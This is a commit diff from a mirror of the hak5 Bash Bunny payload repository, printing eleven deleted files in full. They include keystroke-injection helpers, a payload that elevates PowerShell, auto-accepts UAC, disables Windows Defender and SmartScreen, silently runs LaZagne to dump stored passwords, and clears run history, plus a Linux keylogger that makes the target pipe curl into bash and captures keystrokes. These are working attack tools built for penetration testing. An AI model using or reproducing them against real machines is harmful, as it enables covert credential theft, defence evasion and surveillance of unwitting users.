hak5
/
bashbunny-payloads
mirror of https://github.com/hak5/bashbunny-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Compare commits

base: hak5:f4513c02ed02073d2b0d336b4b24a50bfcc5802c
Branches Tags
hak5:master
hak5:revert-583-master
hak5:cleanup
hak5:v1.2
hak5:v1.1
hak5:v1.0
..
compare: hak5:8b35d04ee57716005aea24ffc248e8b1654fe0a5
Branches Tags
hak5:master
hak5:revert-583-master
hak5:cleanup
hak5:v1.2
hak5:v1.1
hak5:v1.0

1 Commits
f4513c02ed ... 8b35d04ee5

Author SHA1 Message Date
Aleff 8b35d04ee5
Merge 47cf3bde11 into 257081013d 2024-09-03 17:11:48 -05:00
11 changed files with 0 additions and 520 deletions
Show Stats Expand all files Collapse all files

103
payloads/extensions/drop.sh
View File

@ -1,103 +0,0 @@
#!/bin/bash
#
# DROP v1 by bg-wa
# Simplifies dropping files from HID attacks for LINUX
# Usage: DROP [OS] bb_source_file.txt attack_destination_file.txt [overwrite: false] [executable: false]
#
# Example:
# DROP UNITY /root/udisk/payloads/$SWITCH_POSITION/source.sh ~/target_destination.sh true true
source ./run.sh
function DROP() {
os=$1
source=$2
destination=$3
overwrite=$4
executable=$5
case "$os" in
WIN)
RUN WIN powershell
;;
OSX)
RUN OSX terminal
;;
UNITY)
RUN UNITY terminal
;;
LINUX)
RUN LINUX terminal
;;
*)
RUN UNITY terminal
;;
esac
QUACK DELAY 1000
if "$overwrite" == "true"
then
case "$os" in
WIN)
QUACK STRING del "$destination"
;;
*)
QUACK STRING rm "$destination"
;;
esac
QUACK ENTER
QUACK DELAY 500
fi
case "$os" in
WIN)
QUACK STRING fsutil file createnew "$destination"
QUACK ENTER
QUACK DELAY 500
QUACK STRING notepad.exe "$destination"
QUACK ENTER
QUACK DELAY 1000
;;
*)
QUACK STRING vi "$destination"
QUACK ENTER
QUACK DELAY 500
QUACK STRING i
;;
esac
while IFS= read -r data
do
QUACK STRING "$data"
QUACK ENTER
done < "$source"
QUACK DELAY 500
case "$os" in
WIN)
QUACK CTRL s
QUACK CRTL x
;;
*)
QUACK ESC
QUACK ENTER
QUACK STRING :wq
QUACK ENTER
if "$executable" == "true"
then
QUACK STRING chmod +x "$destination"
QUACK ENTER
QUACK DELAY 500
fi
QUACK STRING history -c
QUACK ENTER
QUACK STRING exit
QUACK ENTER
;;
esac
}
export -f DROP

126
payloads/extensions/prompt.sh
View File

@ -1,126 +0,0 @@
#!/bin/bash
################################################################################
# Quickly get to a prompt on any platform with the BashBunny
#
# How this works?
# 1) Once the library is included in your payload, launch terminal\powershell\run
# with:
# PROMPT [OS]
# 2) OS options are:
# "AUTO" : Default - Hak5 2124 cross platform code
# "UNITY" : Launches Terminal in Unity
# "UNITY_RUN" : Opens run prompt in Unity
# "MAC" : Launches Terminal in OSX
# "POWERSHELL" : Launches Powershell in Windows
# "WINDOWS_RUN": Opens run prompt in Windows
# 3) To close a prompt use:
# CLOSE_PROMPT [OS]
################################################################################
################################################################################
# Start HID Prompt
################################################################################
function PROMPT() {
if [ -z "$1" ]; then
OS="AUTO"
else
OS=$1
fi
#AUTO
if [ "${OS}" = "AUTO" ]; then
LED G B 100
QUACK ALT F2
QUACK DELAY 50
QUACK GUI SPACE
QUACK DELAY 50
QUACK GUI r
clear_active_input
wait_enter_wait 200 1000
fi
#UNITY
if [ "${OS}" = "UNITY" ]; then
LED R B 100
QUACK GUI
clear_active_input
QUACK STRING terminal
wait_enter_wait 200 1000
fi
#UNITY_RUN
if [ "${OS}" = "UNITY_RUN" ]; then
LED R B 100
QUACK ALT F2
fi
#MAC
if [ "${OS}" = "MAC" ]; then
LED R B G 100
QUACK GUI SPACE
clear_active_input
QUACK STRING terminal
wait_enter_wait 200 1000
fi
#POWERSHELL
if [ "${OS}" = "POWERSHELL" ]; then
LED B 100
QUACK GUI
QUACK DELAY 500
QUACK powershell
wait_enter_wait 200 1000
fi
#WINDOWS_RUN
if [ "${OS}" = "WINDOWS_RUN" ]; then
LED B 100
QUACK GUI r
QUACK DELAY 500
fi
LED 0
}
function CLOSE_PROMPT() {
if [ -z "$1" ]; then
QUACK ALT F4
else
if [ "$1" = "MAC" ]; then
QUACK GUI w
else
QUACK ALT F4
fi
fi
}
# HELPER FUNCTIONS
function wait_enter_wait() {
if [ -z "$1" ]; then
BEFORE_WAIT=100
else
BEFORE_WAIT=$1
fi
if [ -z "$2" ]; then
AFTER_WAIT=100
else
AFTER_WAIT=$2
fi
QUACK DELAY ${BEFORE_WAIT}
QUACK ENTER
QUACK DELAY ${AFTER_WAIT}
}
function clear_active_input() {
QUACK DELAY 50
QUACK BACKSPACE
QUACK DELAY 100
}
export -f PROMPT
export -f CLOSE_PROMPT

6
payloads/library/credentials/NoDefenseAgainstLaZagne/payload.ps1
View File

@ -1,6 +0,0 @@
$drivelabel = 'BashBunny'
$dest = ((Get-WmiObject win32_volume -f 'label=''$drivelabel''').Name+'loot\PasswordGrabber')
$filter = 'password_'+ $env:COMPUTERNAME
$filecount = ((Get-ChildItem -filter ($filter + "*") -path $dest | Measure-Object | Select -ExpandProperty Count) + 1)
Start-Process -WindowStyle Hidden -FilePath ((Get-WmiObject win32_volume -f 'label=''$drivelabel''').Name+'tooling\LaZagne.exe') -ArgumentList 'all -vv' -RedirectStandardOutput ($dest +'\' + $filter +'_' + $filecount +'.txt')
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue

90
payloads/library/credentials/NoDefenseAgainstLaZagne/payload.txt
View File

@ -1,90 +0,0 @@
#!/bin/bash
#
# Title: Disable Windows Defender and Exfil stored passwords
# Description: Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more...
# This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack.
# This payload makes use of AleZssandroZ awesome LaZagne password recovery tool as well as the Password Grabber by jdebetaz.
# Author: rafa-guillermo
# Props: Hak5Darren, AlessandroZ, TeCHemically, dragmus13, RazerBlade, jdebetaz
# Version: 1.2
# Category: Credentials
# Target: Windows
# Tested On: Windows 11
# Attackmodes: HID, STORAGE
# Options
LOOTDIR=/root/udisk/loot/PasswordGrabber
######## Set-up ########
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
DRIVE_LABEL=BashBunny
######## Make Loot Dir ########
# Setup named logs in loot directory
mkdir -p $LOOTDIR
####### Open a powershell window with elevated privileges #######
LED STAGE1
RUN WIN "powershell -Command \"Start-Process powershell -Verb RunAs\""
sleep 3 # wait for UAC prompt
QUACK ALT y
sleep 2
# Disable Windows Defender File Scan and and Real Time Protection
QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value Off -Force
QUACK ENTER
QUACK STRING Set-ItemProperty -Path HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value Off -Force
QUACK ENTER
QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Edge -Name SmartScreenEnabled -Value Off -Force
QUACK ENTER
QUACK STRING Set-MpPreference -DisableRealtimeMonitoring \$true
QUACK ENTER
QUACK STRING Set-MpPreference -DisableIOAVProtection \$true
QUACK ENTER
QUACK STRING Set-MpPreference -DisableBehaviorMonitoring \$true
QUACK ENTER
QUACK STRING Set-MpPreference -DisableScriptScanning \$true
QUACK ENTER
sleep 1
# Run laZagne
LED STAGE2
QUACK STRING "\$bashBunnyDrive = (Get-WmiObject -Query \"SELECT * FROM Win32_Volume WHERE Label='$DRIVE_LABEL'\" | Select-Object -ExpandProperty DriveLetter)"
QUACK ENTER
QUACK STRING "\$scriptPath = \"\$bashBunnyDrive\\payloads\\$SWITCH_POSITION\\\payload.ps1\""
QUACK ENTER
QUACK STRING \& \$scriptPath
QUACK ENTER
sleep 10
QUACK STRING exit
QUACK ENTER
# Re-enable Defender and Smart screen
LED CLEANUP
RUN WIN "powershell -Command \"Start-Process powershell -Verb RunAs\""
sleep 3 # wait for UAC prompt
QUACK ALT y
sleep 2
QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value On -Force
QUACK ENTER
QUACK STRING Set-ItemProperty -Path HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value On -Force
QUACK ENTER
QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Edge -Name SmartScreenEnabled -Value On -Force
QUACK ENTER
QUACK STRING Set-MpPreference -DisableRealtimeMonitoring \$false
QUACK ENTER
QUACK STRING Set-MpPreference -DisableIOAVProtection \$false
QUACK ENTER
QUACK STRING Set-MpPreference -DisableBehaviorMonitoring \$false
QUACK ENTER
QUACK STRING Set-MpPreference -DisableScriptScanning \$false
QUACK ENTER
sleep 1
QUACK STRING exit
QUACK ENTER
######## FINISH ########
LED FINISH

39
payloads/library/credentials/NoDefenseAgainstLaZagne/readme.md
View File

@ -1,39 +0,0 @@
# NoDefenseAgainstLaZagne
* Author: [rafa-guillermo](https://github.com/rafa-guillermo)
* Creds: [Hak5Darren](https://github.com/hak5darren), [AlessandroZ](https://github.com/AlessandroZ), TeCHemically, dragmus13, RazerBlade, jdebetaz
* Version: 1.0
* Frimware support: 1.1 and higher
* Target version: Windows 11
* Tested on: Windows 11
## Description
Disables Windows defender and runs LaZagne to grab passwords from the host system from apps like: chrome, internet explorer, firefox, filezilla and more. Wifi passwords and Win password hashes included. This payload is quick, but opens up an ugly PS terminal which can probably be obfuscated. This payload springboards off of AleZssandroZ's LaZagne password recovery tool as well as the Password Grabber by jdebetaz.
Full read here: [LaZagne Repository](https://github.com/AlessandroZ/LaZagne)
Password grabber: [Also in this repo](https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/credentials/PasswordGrabber)
## Configuration
1. You need to download LaZagne from the [LaZagne release page](https://github.com/AlessandroZ/LaZagne/releases). Tested with LaZagne 2.2 but might work with newer versions too.
2. Unzip the exe file and place it in the folder called 'tooling' on the root of the Bash Bunny. The payload folder should contain payload.ps1 and payload.txt, LaZagne.exe needs to be in a folder called tooling.
3. Set up your Bash Bunny Drive Label (default is BashBunny, config is on line 22 of payload.txt and line 1 of payload.ps1)
4. Plug your BashBunny and Enjoy
## Info
rafa-guillermo: I've added a whole bunch of stuff to disable Windows Defender file scanner, smart screen and RTP before running LaZagne, I was having issues where otherwise it would immediately be quarantined. Defender will be enabled again after execution.
jdebetaz: I remake this playload with the Payload Best Practice / Style Guide
RazerBlade: By default the payload is identical to the Payload [usb_exfiltrator] but adds some commands to execute LaZagne and save the passwords to the loot folder.
## Disclaimer
__Hak5 and playload's contributors are not responsible for the execution of 3rd party binaries.__
## Led status
| LED | Status |
|-----------------------------------------------|--------|
| Magenta solid | Setup |
| Yellow single blink | Attack |
| Green 1000ms VERYFAST blink followed by SOLID | Finish |

7
payloads/library/execution/drop_n_run/fuse.sh
View File

@ -1,7 +0,0 @@
#!/bin/bash
# Wake up and do something productive here instead...
sleep 10
# boom!!
firefox "http://hak5.org"

30
payloads/library/execution/drop_n_run/payload.txt
View File

@ -1,30 +0,0 @@
#!/bin/bash
#
# Title: The Ol'Drop'n'Run
# Author: bg-wa
# Version: 1.0
# Category: HID
# Target: UNITY
# Attackmodes: HID
#
# Quick HID only attack to write a file to target machine and open
#
# | Attack Stage | Description |
# | ------------------- | ---------------------------------------- |
# | SETUP | Open vi |
# | ATTACK | Writing files |
# | FINISH | Payload Dropped & ran (remove the bunny) |
#
ATTACKMODE HID
LED SETUP
source_script=/root/udisk/payloads/$SWITCH_POSITION/fuse.sh
target_script=\~/fuse.sh
LED ATTACK
DROP $source_script $target_script true true
RUN UNITY $target_script
LED FINISH

20
payloads/library/recon/KeyLogger/Linux.sh
View File

@ -1,20 +0,0 @@
#/bin/bash
checkonbunny() {
mybunny=$(lsblk -p -S -o NAME,SERIAL | grep $BunnyID | awk '{print $1}')
mybunny=$(findmnt $mybunny | grep $mybunny | awk '{print $1}')
if [ -d $mybunny ]; then
bashbunnyloot=$mybunny"/loot"
mapfile=$bashbunnyloot"/maps"
keyfile=$bashbunnyloot"/keys"
startwork
fi
}
startwork(){
getdevicetouse=${getdevicetouse#"id="}
xinput --test $getdevicetouse > $keyfile &
xmodmap -pke > $mapfile
}
BunnyID="ch000001"
bashbunnyloot=''
getdevicetouse=$(xinput |grep keyboard | sed 's/slave keyboard//g' | while IFS= read -r line ;do [[ $line != *"Virtual"* ]] && [[ $line == *"keyboard"* ]] && echo $line | awk '{ for (i=1; i<=NF; ++i) { if ($i ~ "id=") print $i} }'; done)
[[ -z $getdevicetouse ]] || checkonbunny

28
payloads/library/recon/KeyLogger/Readme.md
View File

@ -1,28 +0,0 @@
# Keylogger For Bash Bunny
Author: TheDragonkeeper
Version: Version 1
## Description
Dirty keylogger. Runs a webserver to pull code from for multiOS targeting
Captures all keyboard input without the need for root access
Uses the user keyboard map file for decoding the captured data
## STATUS
| LED | Status |
| ---------------- | ----------------------------------------------------------------------------- |
| Blue flash | Booting |
| Red slow | Waiting on webserver |
| Blue Fast | Identifying Target and deploying accordingly |
| LED OFF | Capturing data, no led for victim to spot, waiting for switch position change |
| LED Red Fast | Decoding keys, Then doing any cleanup required |
| Green flashing | Task complete, ready to unplug |
Still WIP, Currently supports linux (tested on ubuntu)
If you want to add payloads for OSX or Windows place them into the switch folder then,
Change TARGET_OS= to 'auto' and add the payloads to lines 15,16 as well as the clean up to lines 40,41 in payload.txt

43
payloads/library/recon/KeyLogger/payload.txt
View File

@ -1,43 +0,0 @@
TARGET_OS='LINUX'
LED B 100
ATTACKMODE HID STORAGE ECM_ETHERNET
sleep 3
LED R SLOW
GET HOST_IP
GET SWITCH_POSITION
udisk mount
cd /root/udisk/payloads/$SWITCH_POSITION/
python webserver.py &
while true; do [[ $(curl $HOST_IP:8080/index.html) ]] && break ; done
LED B FAST
[[ $TARGET_OS == 'auto' ]] && GET TARGET_OS
[[ $TARGET_OS == 'WINDOWS' ]] && RUN WIN add windows payload
[[ $TARGET_OS == 'MACOS' ]] && RUN OSX add osx payload
[[ $TARGET_OS == 'LINUX' ]] && RUN LINUX bash \-c \'bash \<\(curl http\:\/\/$HOST_IP\:8080\/Linux\.sh\)\' \&
LED
WAIT
LED R 0
cd /root/udisk/loot
keystate=''
_ctrl='0'
_alt='0'
_shift='0'
for line in $(cat 'keys')
do
if [ $line != 'key' ]; then
if [ $line == 'press' ] || [ $line == 'release' ]; then
keystate=$line
else
_spaces=$(printf '%*s' $((4-${#line})) | tr ' ' ' ')
searchparams='keycode'"$_spaces"$line
key=$(cat 'maps' | grep "$searchparams" | awk '{print $4}')
echo "Ctrl="$_ctrl" Alt="$_alt" Shift="$_shift" "$keystate" "$key >> 'decoded'
fi
fi
done
[[ $TARGET_OS == 'WINDOWS' ]] && RUN WIN add windows payload
[[ $TARGET_OS == 'MACOS' ]] && RUN OSX add osx payload
[[ $TARGET_OS == 'LINUX' ]] && RUN LINUX killall xinput
LED G 0

28
payloads/library/recon/KeyLogger/webserver.py
View File

@ -1,28 +0,0 @@
#!/usr/bin/python
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
from os import curdir, sep
PORT_NUMBER = 8080
class myHandler(BaseHTTPRequestHandler):
def do_GET(self):
if self.path=="/":
self.path="/"
try:
sendReply = False
if self.path.endswith(".sh"):
mimetype='text/plain'
sendReply = True
if sendReply == True:
f = open(curdir + sep + self.path)
self.send_response(200)
self.send_header('Content-type',mimetype)
self.end_headers()
self.wfile.write(f.read())
f.close()
return
except IOError:
self.send_error(404,'File Not Found: %s' % self.path)
try:
server = HTTPServer(('0.0.0.0', PORT_NUMBER), myHandler)
server.serve_forever()
except KeyboardInterrupt:
server.socket.close()